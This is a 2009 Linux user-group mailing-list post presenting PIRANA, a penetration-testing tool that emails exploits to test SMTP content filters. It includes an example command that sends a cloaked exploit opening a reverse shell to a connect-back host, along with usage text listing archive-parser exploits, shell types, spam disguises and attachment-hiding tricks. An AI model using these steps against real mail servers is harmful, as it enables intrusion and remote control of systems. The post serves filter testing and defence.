HackFest Series: Pirana Email Holiday Greetings
Lisa Kachold
lisakachold at obnosis.com
Thu Dec 24 17:48:19 MST 2009
Pirana
PIRANA is a penetration testing framework to help in checking a SMTP
content filter's security. It works by attaching an exploit to an
email, optionally disguising it from content filters. PIRANA also lets
you choose from different type of shellcodes to use and has various
options to be stealthy.
http://www.guay-leroux.com/projects/SMTP%20content%20filters.pdf
http://backtrack.offensive-security.com/index.php/Tools#Pirana
Posted Last Year at Xmas to PLUG Archives from Backtrack2 (obfuscated
without full links or correct pirana.pl spelling):
http://www.mail-archive.com/plug-discuss@lists.plug.phoenix.az.us/msg08695.html
The Bt2 HowTo:
http://www.linuxhaxor.net/?p=337
Solutions to protect include clamav/spamassassin but this could depend
on your spamassassin and other installation specifics.
Pirana.pl example: Connect back with a reverse shell just by sending an email
using cloaking.
$ pirana.pl -e 4 -c 1 -l mynewshellhost -h mail.mydomain.com -a
[EMAIL PROTECTED]
Usage: pirana.pl [MANDATORY ARGS] [OPTIONAL ARGS]
Mandatory arguments:
-e+ Exploit number to use (See below)
-h+ SMTP server to test
-a+ Destination email address used in probing
Optional arguments:
-s+ Shellcode type to inject into exploits (See below)
-c+ Cloaking style (See below)
-d+ Try to vanish attachments from MUA's view (See below)
-v Attach EICAR virus to improve stealthness
-z Pack all the malware into a tarball to be less noisy
-p+ Port to use in reverse shell or bind shell
-l+ Host to connect back in reverse shell mode
Valid exploits numbers:
0 OSVDB #5753: LHA get_header File Name Overflow
1 OSVDB #5754: LHA get_header Directory Name Overflow
2 OSVDB #6456: file readelf.c tryelf() ELF Header Overflow
3 OSVDB #11695: unarj Filename Handling Overflow
4 OSVDB #23460: ZOO combine File and Dir name overflow
5 OSVDB #15867: Convert UUlib uunconc integer overflow
6 OSVDB #XXX: ZOO next offset infinite loop DoS
Valid shellcode types:
0 TCP reverse shell
1 UDP reverse shell
2 TCP bind shell
Valid cloaking styles (consult whitepaper for visual result):
0 No cloaking at all (default)
1 Viagra spam message
2 "Look at the pictures I promised you!"
Vanishing techniques for attachments:
0 No vanishing at all (default)
1 Multipart/alternative trick
2 <img src="image.JPG" width=0 height=0> trick
Test Test Test!
Merry merry merry!
--
Skype: (623)239-3392
AT&T: (503)754-4452
http://uncyclopedia.wikia.com/wiki/Santa
More information about the PLUG-discuss
mailing list